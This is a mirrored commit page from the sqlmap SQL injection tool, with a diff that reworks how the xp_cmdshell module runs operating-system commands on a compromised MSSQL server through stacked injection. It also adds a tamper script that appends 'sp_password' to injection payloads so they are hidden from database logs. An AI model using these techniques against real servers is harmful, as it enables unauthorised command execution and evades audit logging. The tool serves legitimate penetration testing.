sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-16 19:40:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Fix for Issue #62

Browse Source
This commit is contained in:
Miroslav Stampar 2012-07-06 12:24:55 +02:00
parent bc5025b06c
commit 982fcde1c0
3 changed files with 46 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
lib/core/bigarray.py
View File

@ -69,6 +69,14 @@ class BigArray(list):
with open(self.chunks[index], "rb") as fp: with open(self.chunks[index], "rb") as fp:
self.cache = Cache(index, pickle.load(fp), False) self.cache = Cache(index, pickle.load(fp), False)
def __getslice__(self, i, j):
retval = BigArray()
i = max(0, len(self) + i if i < 0 else i)
j = min(len(self), len(self) + j if j < 0 else j)
for _ in xrange(i, j):
retval.append(self[_])
return retval
def __getitem__(self, y): def __getitem__(self, y):
index = y / BIGARRAY_CHUNK_LENGTH index = y / BIGARRAY_CHUNK_LENGTH
offset = y % BIGARRAY_CHUNK_LENGTH offset = y % BIGARRAY_CHUNK_LENGTH

23
lib/takeover/xp_cmdshell.py
View File

@ -9,6 +9,7 @@ from lib.core.agent import agent
from lib.core.common import Backend from lib.core.common import Backend
from lib.core.common import getSPQLSnippet from lib.core.common import getSPQLSnippet
from lib.core.common import hashDBWrite from lib.core.common import hashDBWrite
from lib.core.common import isListLike
from lib.core.common import isNoneValue from lib.core.common import isNoneValue
from lib.core.common import pushValue from lib.core.common import pushValue
from lib.core.common import popValue from lib.core.common import popValue
@ -154,8 +155,6 @@ class xp_cmdshell:
return inject.goStacked(cmd, silent) return inject.goStacked(cmd, silent)
def xpCmdshellEvalCmd(self, cmd, first=None, last=None): def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
self.getRemoteTempPath()
if conf.direct: if conf.direct:
output = self.xpCmdshellExecCmd(cmd) output = self.xpCmdshellExecCmd(cmd)
@ -170,23 +169,11 @@ class xp_cmdshell:
output = new_output output = new_output
else: else:
tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd))
cmd = "%s > \"%s\"" % (cmd, tmpFile) output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False)
self.xpCmdshellExecCmd(cmd)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
self.delRemoteFile(tmpFile)
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
inject.goStacked("DELETE FROM %s" % self.cmdTblName) inject.goStacked("DELETE FROM %s" % self.cmdTblName)
if output and isListLike(output):
if output and isinstance(output, (list, tuple)): output = output[1:]
output = output[0]
if output and isinstance(output, (list, tuple)):
output = output[0]
return output return output

33
tamper/sp_password.py Normal file
View File

@ -0,0 +1,33 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH
def tamper(payload):
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Example:
* Input: 1 AND 9227=9227--
* Output: 1 AND 9227=9227--sp_password
Requirement:
* MSSQL
Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
* Reference: http://websec.ca/kb/sql_injection
"""
retVal = ""
if payload:
retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
return retVal